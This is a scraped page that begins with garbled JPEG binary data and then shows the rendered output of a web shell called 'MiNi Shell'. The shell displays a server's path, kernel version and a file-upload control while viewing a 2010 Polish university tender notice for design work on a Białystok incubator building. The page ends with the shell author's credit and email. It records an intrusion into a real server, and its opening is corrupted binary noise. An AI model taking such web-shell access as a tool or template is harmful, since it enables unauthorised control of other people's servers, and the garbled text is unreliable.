JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100224/39521-N-2010.html

<p class="kh_header"><b>Białystok: wykonanie pełnobranżowej dokumentacji projektowo-kosztorysowej na potrzeby: Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii Politechniki Białostockiej  jako instrumentu na rzecz tworzenia warunków dla rozwoju innowacyjności gospodarki i regionu a także koncepcji dla pozostałej części budynku zlokalizowanego w Białymstoku przy ul. Zwierzynieckiej 10.</b><br>
<b>Numer ogłoszenia: 39521 - 2010; data zamieszczenia: 24.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika  Białostocka , ul. Wiejska 45A, 15-351 Białystok, woj. podlaskie, tel. (085) 7469750, faks (085) 7469752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pb.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie pełnobranżowej dokumentacji projektowo-kosztorysowej na potrzeby: Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii Politechniki Białostockiej  jako instrumentu na rzecz tworzenia warunków dla rozwoju innowacyjności gospodarki i regionu a także koncepcji dla pozostałej części budynku zlokalizowanego w Białymstoku przy ul. Zwierzynieckiej 10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie:  
pełnobranżowej dokumentacji projektowo-kosztorysowej na potrzeby: Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii Politechniki Białostockiej, który będzie realizowany ze środków Regionalnego Programu Operacyjnego Województwa Podlaskiego 
w ramach projektu Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii Politechniki Białostockiej jako instrumentu na rzecz tworzenia warunków dla rozwoju innowacyjności gospodarki i regionu  a także koncepcji dla pozostałej części budynku zlokalizowanego w Białymstoku przy ul. Zwierzynieckiej 10.
 Zakres przebudowy obejmuje budynek Stołówki oraz Zespół sal Klubowo Gimnastycznych zlokalizowanych przy ul. Zwierzynieckiej 10. Klub Gwint nadal pozostanie w budynku stołówki. Rozbudowa budynku Sali gimnastycznej nie jest możliwa ze względu na mocno rozbudowaną sieć kablową Sn o (15kV), znajdującą się wokół budynku ze względu na istniejącą tam rozdzielnię głównego punktu zasilającego PB.

I   Przedmiot zamówienia obejmuje wykonanie :

a)	koncepcji przebudowy budynku (Białystok, ul. Zwierzyniecka 10) na potrzeby Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii a także na potrzeby innych jednostek organizacyjnych Politechniki Białostockiej  wraz z zagospodarowaniem terenu - opracowanie w zakresie niezbędnym do uzyskania decyzji o lokalizacji celu publicznego
                                                                                                                                                  -4 egz.
b)	wyceny kosztorysowa inwestycji dla każdej z części				          - 2 egz.
c)	wersji elektronicznej koncepcji  na CD-R   po 1 egzemplarzu w formacie PDF i DWG
d)	 projektu budowlanego na potrzeby Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii - w zakresie niezbędnym do uzyskania pozwolenia na budowę - 5 egz.
e)	pełnobranżowej dokumentacji projektowej (projekty wykonawcze) na potrzeby Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii t.j.
- Projekt wykonawczy- architektura wraz z aranżacją wnętrz,
- Projekt wykonawczy zagospodarowania terenu,
- Projekt wykonawczy  konstrukcyjny,
-	Projekt wykonawczy instalacji c.o,
-	Projekt węzła cieplnego,
-	Projekt instalacji ciepła technologicznego,
-	Projekt wykonawczy instalacji wod.- kan. i p.poż. wraz z przebudową przyłączy kanalizacyjnych, 
-	Projekt wykonawczy instalacji wentylacji mechanicznej i klimatyzacji,
-	Projekt wykonawczy instalacji elektrycznych wewnętrznych z liniami zasilającymi,
-	Projekt wykonawczy instalacji odgromowej,
-	Projekt wykonawczy instalacji telefonicznej,
-	Projekt wykonawczy instalacji okablowania strukturalnego,
-	Projekt wykonawczy instalacji sygnalizacji pożaru,
-	Projekt wykonawczy instalacji telewizji dozorowej dla wskazanych pomieszczeń ,
-	Projekt wykonawczy instalacji urządzeń audiowizualnych we wskazanych    pomieszczeniach,
-	Projekt wykonawczy instalacji włamania i kontroli dostępu,
-	Projekty wykonawcze technologiczne niezbędne dla tego zakresu

Każdy z ww projektów wykonawczych należy opracować  w 6 egzemplarzach.

g)	 specyfikacji technicznych wykonania i odbioru robót na potrzeby Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii	 	                           -6 egz.
h)	 kosztorysów inwestorskich i przedmiarów robót dla potrzeb kosztorysów inwestorskich   na potrzeby Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii	   	                                                                                              -2 egz.
i)	 wersji elektronicznej dokumentacji projektowo- kosztorysowej na CD-R na potrzeby Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii	 po 
1 egzemplarzu w formacie PDF i DWG.  
j)	rysunków wizualizacji                                                                                           - 6 rys.

Ad. I a i I   b)

Projekt koncepcji i wycena kosztorysowa musi uwzględnić podział na dwie niezależne do realizacji części : 
1)	na potrzeby Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii,
2)	na potrzeby innych jednostek organizacyjnych Politechniki Białostockiej
zgodnie z minimalnym zapotrzebowaniem wynikającym z punktu II.

II  Minimalne zapotrzebowanie dotyczące przebudowy:
 
Część 1
Na potrzeby Akademickiego Inkubatora Przedsiębiorczości i Wybranych Nowych Technologii Politechniki Białostockiej
a)	minimum 12-15 pomieszczeń biurowych
b)	interdyscyplinarne laboratorium komputerowe z zapleczem na serwer ok. 20 stanowisk
c)	sala konferencyjna z zapleczem audiowizualnym na 25 osób
d)	niezbędne pomieszczenia obsługi budynku,
e)	niezbędne pomieszczenia techniczne,
f)	szatnia
g)	portiernia,
h)	sanitariaty ,
i)	hol i korytarze
W ramach prac adaptacyjnych do potrzeb funkcjonowania Inkubatora przeznacza się ok. 400 m2. ( parter budynku stołówki )


Część 2
Na potrzeby innych jednostek organizacyjnych Politechniki Białostockiej 

a)	pomieszczenia 						(20 pomieszczeń po 25,0 m2  każde),
b)	pomieszczenia 						(2 pomieszczenia po 50,0 m2  każde),
c)	pomieszczenie  					           (70 m2)
d)	pomieszczenie   					           (200,0 m2,)
e)	sanitariaty
f)	pomieszczenia techniczne 
g)	korytarze
h)	pomieszczenie						(740 m2)
i)	2 pomieszczenia biurowe i 2 pomieszczenia magazynowe, 1 pomieszczenie warsztatowe oraz laboratorium WN dla Działu Elektroenergetycznego   		           (120 m2)
j)	pomieszczenie biurowe i pomieszczenie warsztatowe Działu Aparatury  	( 60 m2)
k)	pomieszczenie magazynowe							(600m2)
l)	pomieszczenie czytelni  							(30 m2)
m)	pracownia przygotowawcza - konserwatorska z wyposażeniem  		(30 m2)	
n)	pomieszczenie biurowe 							(30 m2)

Laboratoria Wydziału Elektrycznego
o)	Laboratorium Technik Wysokich Napięć					(400 m2)
p)	Katedra Promieniowania Optycznego					(250 m2)
q)	Laboratorium Inżynierii Materiałów Elektrycznych i Elektronicznych	(170 m2)
r)	Zakład Elektroenergetyki							(75 m2)

Ze względu na przewidywaną etapową realizację projektu  dokumentacja projektowo-kosztorysowa powinna uwzględniać możliwość odrębnego niezależnego wykonania przebudowy i rozbudowy każdej z dwóch wydzielonych części  istniejącego budynku stołówki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością 2  dokumentacje projektowe (dokumentacja pełnobranżowa) na obiekt o kubaturze co najmniej 5 000 m3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zapewni (oświadczy), że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, tzn. będą to projektanci  z odpowiednimi uprawnieniami należący do właściwej izby samorządu zawodowego,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach zaistnienia okoliczności, nie leżących po stronie Wykonawcy, 
a uniemożliwiających mu, dotrzymania terminu wykonania zamówienia lub też w istotny sposób utrudniające możliwość spełniania świadczenia w terminie, Wykonawca będzie mógł zwrócić się do Zamawiającego z uzasadnionym wnioskiem o przedłużenie terminu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych PB
ul. Zwierzyniecka 6 pok. nr 4
15-333 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2010 godzina 09:00, miejsce: Dział Zamówień Publicznych PB
ul. Zwierzyniecka 6 pok. nr 4
15-333 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt Akademicki Inkubator Przedsiębiorczości i Wybranych Nowych Technologii Politechniki Białostockiej współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego w latach 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com